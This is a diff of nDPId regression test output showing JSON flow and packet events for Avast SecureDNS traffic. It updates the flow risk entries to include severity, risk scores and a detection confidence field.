 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1625482486856,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625482486856,"pkt":"eJS0JASgYDjgxTWgCABFAABD\/EUAAH8RouzAqAJktdYjldUSAbsAL8JN\/WEBAAABAAAAAAAAATIJc2VDVXJlZG5TBUFWQXN0A0NPTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482486856,"flow_last_seen":1625482486856,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482486856,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482486856,"flow_last_seen":1625482486856,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482486856,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1625482486976,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625482486976,"pkt":"YDjgxTWgeJS0JASgCABFAADMt\/IAADMRMre11iOVwKgCZAG71RIAuDq8\/WGBgAABAAEAAAAAATIJc2VDVXJlZG5TBUFWQXN0A0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482318517,"flow_last_seen":1625482318634,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482396199,"flow_last_seen":1625482396320,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482401089,"flow_last_seen":1625482401211,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484544,"flow_last_seen":1625482484661,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482399044,"flow_last_seen":1625482399165,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482316411,"flow_last_seen":1625482316532,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482486856,"flow_last_seen":1625482486976,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482318517,"flow_last_seen":1625482318634,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51415,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482396199,"flow_last_seen":1625482396320,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":63776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482401089,"flow_last_seen":1625482401211,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49737,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484544,"flow_last_seen":1625482484661,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482484661,"flow_last_seen":1625482484661,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60127,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482399044,"flow_last_seen":1625482399165,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50008,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482316411,"flow_last_seen":1625482316532,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482486856,"flow_last_seen":1625482486976,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54546,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482998213,"flow_last_seen":1625482998213,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1625482998213,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625482998213,"pkt":"eJS0JASgYDjgxTWgCABFAABDf48AAH8RH6PAqAJktdYjlfuwAbsAL9NLpcUBAAABAAAAAAAAATIJc0VjdVJlZE5TBUF2YXNUA0NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482998213,"flow_last_seen":1625482998213,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625482998213,"flow_last_seen":1625482998213,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625482998213,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1625482998333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625482998333,"pkt":"YDjgxTWgeJS0JASgCABFAADM\/oEAADMR7Ce11iOVwKgCZAG7+7AAuEu6pcWBgAABAAEAAAAAATIJc0VjdVJlZE5TBUF2YXNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483010449,"flow_last_seen":1625483010449,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483010449,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1625483010449,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625483010449,"pkt":"eJS0JASgYDjgxTWgCABFAABDf5MAAH8RH5\/AqAJktdYjlejdAbsALyrioMIBAAABAAAAAAAAATIJc0VDVXJFRG5zBWFWQXN0A2NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483010449,"flow_last_seen":1625483010449,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483010449,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483010449,"flow_last_seen":1625483010449,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483010449,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1625483010570,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625483010570,"pkt":"YDjgxTWgeJS0JASgCABFAADMH70AADMRyuy11iOVwKgCZAG76N0AuKNQoMKBgAABAAEAAAAAATIJc0VDVXJFRG5zBWFWQXN0A2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073336,"flow_last_seen":1625483073336,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483073336,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1625483073336,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625483073336,"pkt":"eJS0JASgYDjgxTWgCABFAABDR0IAAH8RV\/DAqAJktdYjlf4nAbsAL7S54cABAAABAAAAAAAAATIJc0VDVXJFRG5zBWF2QXN0A0NvTQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073336,"flow_last_seen":1625483073336,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483073336,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073336,"flow_last_seen":1625483073336,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483073336,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1625483073457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1625483073457,"pkt":"YDjgxTWgeJS0JASgCABFAADMaN0AADIRgsy11iOVwKgCZAG7\/icAuC0o4cCBgAABAAEAAAAAATIJc0VDVXJFRG5zBWF2QXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1625483073457,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1625483073457,"pkt":"eJS0JASgYDjgxTWgCABFAABDRz4AAH8RV\/TAqAJktdYjlcrZAbsAL46OWvoBAAABAAAAAAAAATIJU0VjVXJlRG5zBWFWQXN0A2NPbQAAEAAB"}
-00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1625483073457,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}}
